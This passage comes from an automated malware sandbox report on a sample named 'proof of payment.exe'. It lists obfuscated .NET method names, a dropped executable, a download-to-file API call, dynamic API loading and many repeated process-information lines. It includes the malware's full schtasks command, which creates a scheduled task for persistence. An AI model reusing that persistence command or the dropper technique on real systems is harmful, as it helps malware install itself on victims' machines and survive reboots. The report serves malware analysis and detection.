                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, qGDm8F0vo4f3CaqRJ8.csHigh entropy of concatenated method names: 'c78HLgHUJD', 'OBcHak649G', 'HxgHShtAgg', 'D7AH03dKoM', 'RU2HDuDAkb', 'r8fSy1OZPp', 'ld3SCkaKsE', 'dqZSE4uAIY', 'sVjSJL2H0w', 'fGRSe1Mo6S'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, WHxJ2tyopBTMyOacdk.csHigh entropy of concatenated method names: 'kc60OmF2oo', 'qQv0WULlM8', 'NDL02FH5fP', 'HSm0BrfdRb', 'Hpe0xmPnWd', 'Ywq0vpPw6W', 'juF03HXE3f', 'fBJ0genqfJ', 'y6L0U7JlFI', 'dDt04ixvVE'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, eoECqEoP1MV499hB3G.csHigh entropy of concatenated method names: 'ToString', 'wheGQdrMV0', 'X8oGt9PNmQ', 'cB2GcFGSZO', 'MGBGqIH73k', 'qraGmQh86Y', 'HotGwQikvy', 'T9JGd1uxqQ', 'NvXG5d7waa', 'ip6G1ABwCa'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, j4jqMnwViZQb4cRVS7.csHigh entropy of concatenated method names: 'C9HVBUcx40', 'CkBVvXsIr4', 'EiFVg3cDwC', 'l7qVU2qi0a', 'tomVsRKk2M', 'VFSVGX4w9O', 'PYpVpv8PZb', 'FjLVXSkC6V', 'EyMVKJyQx1', 'WeGVh5xc7G'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, R0k6N6vsjjBavB4q3V.csHigh entropy of concatenated method names: 'd8EfglaEhg', 'DPqfUINGbJ', 'F9qf9Niwtu', 'dT3ftUcLhm', 'XMHfqEONFQ', 'fwRfmkUYMa', 'tIPfdNk927', 'egTf5HkCwQ', 'hd6flQi1gS', 'YOVfQJ8A9a'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, ijAOQ7mRGBRMsxXAQS.csHigh entropy of concatenated method names: 'id80MrVhlr', 'fsw0VIEihp', 'qC50HAu48f', 'SbtHFc2cwO', 'TSoHzCf1XE', 'cjl08o6SaB', 'UMb07Xp8jK', 'B3K0raOfa1', 'UVw0T6ZRnD', 'o6D0jMNDxJ'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, m27lXb6r4MZHCO3jU8.csHigh entropy of concatenated method names: 'Sih2OOCtM', 'n52BO9bSD', 'b8RvG7YEC', 'JXZ30KgVr', 'rssU2I0M5', 'rWO4W2Hc1', 'zDuv7tNsEPTgry2KMo', 'C5w0yhE86TSUGIafMT', 'UZGX8cNuO', 'g2XhkjOhy'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, NmD84IhXqX5T6TEkV6.csHigh entropy of concatenated method names: 'wCHpJPJyR0', 'sxRpFvTw8H', 'eJMX8bKCu2', 'fUQX79yjrG', 'VZUpQaEvUO', 'x3opPsGdNj', 'xy0pALit6q', 'WV5pRXljyr', 'OxCpZLEIc9', 'cOPpnkgyns'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, F2PTqtdykfFUcIb56j.csHigh entropy of concatenated method names: 'AYgX9KKbxn', 'IqJXtfDiRt', 'UREXcWxQJf', 'VvfXqHxDDH', 'EYjXREkAOI', 'IjNXmuPgeM', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, lCRMA5DlhXbJjo7mgP.csHigh entropy of concatenated method names: 'XOUK7fOCGk', 'eBtKTbHBlE', 'GNrKjjqQYp', 'mniKMCNMTC', 'HkgKaTcPaL', 's5bKSBPZ9g', 'G7kKHQUQjE', 't64XE23Zn0', 'mkBXJjYgka', 'DVXXeBXhbW'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, pr8Do41Q1tqFwxoK05.csHigh entropy of concatenated method names: 'eWBTLXt3er', 'iOtTMlUF5l', 'OQ4TaT1ZsC', 'VibTVbpR7H', 'ADVTS4dCv0', 'KadTHMkTAy', 'vNhT0qwQbT', 'VZtTD7HKkP', 'dxpTIOGC08', 'qQHTu998oi'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, rhi5WUbqRqYWJ4I5aL.csHigh entropy of concatenated method names: 'gXhpu9v1k5', 'OIqpkIdKxY', 'ToString', 'De3pMtqr5e', 'eIlpa4KGgS', 'jRTpVokqo0', 'LYEpSmeS0j', 'ALqpH6LbN9', 'vosp0ysL2B', 'wmRpDn8t0K'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, CmapgpqkNF7N5qJ90ud.csHigh entropy of concatenated method names: 'alqKOrJ0pj', 'og8KWuXd29', 'iIAK2rCVFe', 'GWTKBUdRp1', 'UwMKx4rRBo', 'RDHKvT0qhU', 'fjHK3v12CM', 'cmdKgBShHa', 'YhIKUBFLmT', 'JmNK404BNS'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, HZasU9nsywqiKFgaDv.csHigh entropy of concatenated method names: 'onQaRYYxBE', 'IM2aZtghIN', 'RpFanjrrNu', 'sIka6VaZwU', 'BavayUICgv', 'PdAaCMI85I', 'KmEaES8IZt', 'nKraJ28955', 'opkaew46xI', 'K1xaFe1Yc2'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, t3dR5NEyPQ0BnbAjPf.csHigh entropy of concatenated method names: 'KNHXMolEP8', 'MFVXaqPpuS', 'APNXVJBc3n', 'bE9XSoGTZE', 'uoYXHO6fxn', 'AYZX0iFBhY', 'OGvXD9JRVh', 'dHcXIGfsdW', 'TIpXufgcOF', 'wufXkDqp0f'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, zUd261zcGb9YwcjLSm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UUtKfeexau', 'QuMKsB0qwN', 'vbwKGbQ8Rm', 'GC9KpQCDUY', 'qhYKX3mUHu', 't4TKKjEyun', 'v3iKhbT2Un'
                    Source: 0.2.proof of payment.exe.6a30000.7.raw.unpack, ir4OiiaLqZUjSaiS1D.csHigh entropy of concatenated method names: 'BPZ70EqBf8', 'Iso7D7DIGj', 'mON7u8pSmB', 'otW7kHJ1EU', 'Nph7snNx7b', 'N7o7Gd9CgL', 'YWb0Zj1DxBQUSZDFr5', 'd0DGejsIX4gCSvvaDM', 'gTr77yfym1', 'fiq7TWyUCH'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, O04JbMpW67PNEoiq0y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LFnreChvBM', 'qc9rFHbpxX', 'EFMrz9uWvg', 'BcUT8VKtCk', 'pNaT7QbYeb', 'gELTr0RMka', 'nonTTNEExw', 'JKqTCRtT02uAYJPq4DQ'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, KgSR3u8nGBA1sLZNNP.csHigh entropy of concatenated method names: 'P3kSxguUdE', 'rrfS3P41Lg', 'HtWVcnAS2h', 'vruVqTjcr6', 'juvVmxsd82', 'EVcVw6TC5x', 'b4gVdPOK25', 'olRV59jdO9', 'U3cV1JFlpf', 'fj9Vl0ddoF'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, woM7QtlW1bUYg1UktQ.csHigh entropy of concatenated method names: 'Dispose', 'Igf7eh15cC', 'dHLrtBkvqb', 'hvSii582gn', 'iui7Fc4kqI', 'nXH7z6UCLr', 'ProcessDialogKey', 'cfhr86d3tt', 'HFwr7YmbAM', 'xunrrPcb5R'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, qGDm8F0vo4f3CaqRJ8.csHigh entropy of concatenated method names: 'c78HLgHUJD', 'OBcHak649G', 'HxgHShtAgg', 'D7AH03dKoM', 'RU2HDuDAkb', 'r8fSy1OZPp', 'ld3SCkaKsE', 'dqZSE4uAIY', 'sVjSJL2H0w', 'fGRSe1Mo6S'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, WHxJ2tyopBTMyOacdk.csHigh entropy of concatenated method names: 'kc60OmF2oo', 'qQv0WULlM8', 'NDL02FH5fP', 'HSm0BrfdRb', 'Hpe0xmPnWd', 'Ywq0vpPw6W', 'juF03HXE3f', 'fBJ0genqfJ', 'y6L0U7JlFI', 'dDt04ixvVE'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, eoECqEoP1MV499hB3G.csHigh entropy of concatenated method names: 'ToString', 'wheGQdrMV0', 'X8oGt9PNmQ', 'cB2GcFGSZO', 'MGBGqIH73k', 'qraGmQh86Y', 'HotGwQikvy', 'T9JGd1uxqQ', 'NvXG5d7waa', 'ip6G1ABwCa'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, j4jqMnwViZQb4cRVS7.csHigh entropy of concatenated method names: 'C9HVBUcx40', 'CkBVvXsIr4', 'EiFVg3cDwC', 'l7qVU2qi0a', 'tomVsRKk2M', 'VFSVGX4w9O', 'PYpVpv8PZb', 'FjLVXSkC6V', 'EyMVKJyQx1', 'WeGVh5xc7G'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, R0k6N6vsjjBavB4q3V.csHigh entropy of concatenated method names: 'd8EfglaEhg', 'DPqfUINGbJ', 'F9qf9Niwtu', 'dT3ftUcLhm', 'XMHfqEONFQ', 'fwRfmkUYMa', 'tIPfdNk927', 'egTf5HkCwQ', 'hd6flQi1gS', 'YOVfQJ8A9a'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, ijAOQ7mRGBRMsxXAQS.csHigh entropy of concatenated method names: 'id80MrVhlr', 'fsw0VIEihp', 'qC50HAu48f', 'SbtHFc2cwO', 'TSoHzCf1XE', 'cjl08o6SaB', 'UMb07Xp8jK', 'B3K0raOfa1', 'UVw0T6ZRnD', 'o6D0jMNDxJ'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, m27lXb6r4MZHCO3jU8.csHigh entropy of concatenated method names: 'Sih2OOCtM', 'n52BO9bSD', 'b8RvG7YEC', 'JXZ30KgVr', 'rssU2I0M5', 'rWO4W2Hc1', 'zDuv7tNsEPTgry2KMo', 'C5w0yhE86TSUGIafMT', 'UZGX8cNuO', 'g2XhkjOhy'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, NmD84IhXqX5T6TEkV6.csHigh entropy of concatenated method names: 'wCHpJPJyR0', 'sxRpFvTw8H', 'eJMX8bKCu2', 'fUQX79yjrG', 'VZUpQaEvUO', 'x3opPsGdNj', 'xy0pALit6q', 'WV5pRXljyr', 'OxCpZLEIc9', 'cOPpnkgyns'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, F2PTqtdykfFUcIb56j.csHigh entropy of concatenated method names: 'AYgX9KKbxn', 'IqJXtfDiRt', 'UREXcWxQJf', 'VvfXqHxDDH', 'EYjXREkAOI', 'IjNXmuPgeM', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, lCRMA5DlhXbJjo7mgP.csHigh entropy of concatenated method names: 'XOUK7fOCGk', 'eBtKTbHBlE', 'GNrKjjqQYp', 'mniKMCNMTC', 'HkgKaTcPaL', 's5bKSBPZ9g', 'G7kKHQUQjE', 't64XE23Zn0', 'mkBXJjYgka', 'DVXXeBXhbW'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, pr8Do41Q1tqFwxoK05.csHigh entropy of concatenated method names: 'eWBTLXt3er', 'iOtTMlUF5l', 'OQ4TaT1ZsC', 'VibTVbpR7H', 'ADVTS4dCv0', 'KadTHMkTAy', 'vNhT0qwQbT', 'VZtTD7HKkP', 'dxpTIOGC08', 'qQHTu998oi'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, rhi5WUbqRqYWJ4I5aL.csHigh entropy of concatenated method names: 'gXhpu9v1k5', 'OIqpkIdKxY', 'ToString', 'De3pMtqr5e', 'eIlpa4KGgS', 'jRTpVokqo0', 'LYEpSmeS0j', 'ALqpH6LbN9', 'vosp0ysL2B', 'wmRpDn8t0K'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, CmapgpqkNF7N5qJ90ud.csHigh entropy of concatenated method names: 'alqKOrJ0pj', 'og8KWuXd29', 'iIAK2rCVFe', 'GWTKBUdRp1', 'UwMKx4rRBo', 'RDHKvT0qhU', 'fjHK3v12CM', 'cmdKgBShHa', 'YhIKUBFLmT', 'JmNK404BNS'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, HZasU9nsywqiKFgaDv.csHigh entropy of concatenated method names: 'onQaRYYxBE', 'IM2aZtghIN', 'RpFanjrrNu', 'sIka6VaZwU', 'BavayUICgv', 'PdAaCMI85I', 'KmEaES8IZt', 'nKraJ28955', 'opkaew46xI', 'K1xaFe1Yc2'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, t3dR5NEyPQ0BnbAjPf.csHigh entropy of concatenated method names: 'KNHXMolEP8', 'MFVXaqPpuS', 'APNXVJBc3n', 'bE9XSoGTZE', 'uoYXHO6fxn', 'AYZX0iFBhY', 'OGvXD9JRVh', 'dHcXIGfsdW', 'TIpXufgcOF', 'wufXkDqp0f'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, zUd261zcGb9YwcjLSm.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UUtKfeexau', 'QuMKsB0qwN', 'vbwKGbQ8Rm', 'GC9KpQCDUY', 'qhYKX3mUHu', 't4TKKjEyun', 'v3iKhbT2Un'
                    Source: 0.2.proof of payment.exe.3a79b88.1.raw.unpack, ir4OiiaLqZUjSaiS1D.csHigh entropy of concatenated method names: 'BPZ70EqBf8', 'Iso7D7DIGj', 'mON7u8pSmB', 'otW7kHJ1EU', 'Nph7snNx7b', 'N7o7Gd9CgL', 'YWb0Zj1DxBQUSZDFr5', 'd0DGejsIX4gCSvvaDM', 'gTr77yfym1', 'fiq7TWyUCH'
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00406EB0 ShellExecuteW,URLDownloadToFileW,12_2_00406EB0
                    Source: C:\Users\user\Desktop\proof of payment.exeFile created: C:\Users\user\AppData\Roaming\NvbYSEq.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AA4A

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
